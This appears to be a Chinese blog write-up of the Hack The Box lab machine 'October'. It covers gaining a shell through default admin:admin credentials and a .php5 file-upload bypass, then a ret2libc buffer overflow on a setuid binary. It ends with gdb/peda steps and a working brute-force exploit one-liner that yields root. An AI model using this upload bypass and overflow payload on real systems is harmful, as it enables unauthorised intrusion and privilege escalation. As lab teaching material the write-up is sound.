当前位置: 代码迷 >> 综合 >> Hack the box靶机 October
  详细解决方案

Hack the box靶机 October

热度:14   发布时间:2023-12-03 13:10:15.0

在这里插入图片描述在这里插入图片描述

搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????

在这里插入图片描述

有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限

在这里插入图片描述在这里插入图片描述

dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧

看了一晚上+一个白天
算是明白原理以及利用了

在这里插入图片描述

算了,直接贴传送门吧
国外大佬写的靶机教程
很详细

大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限

安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done  

对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝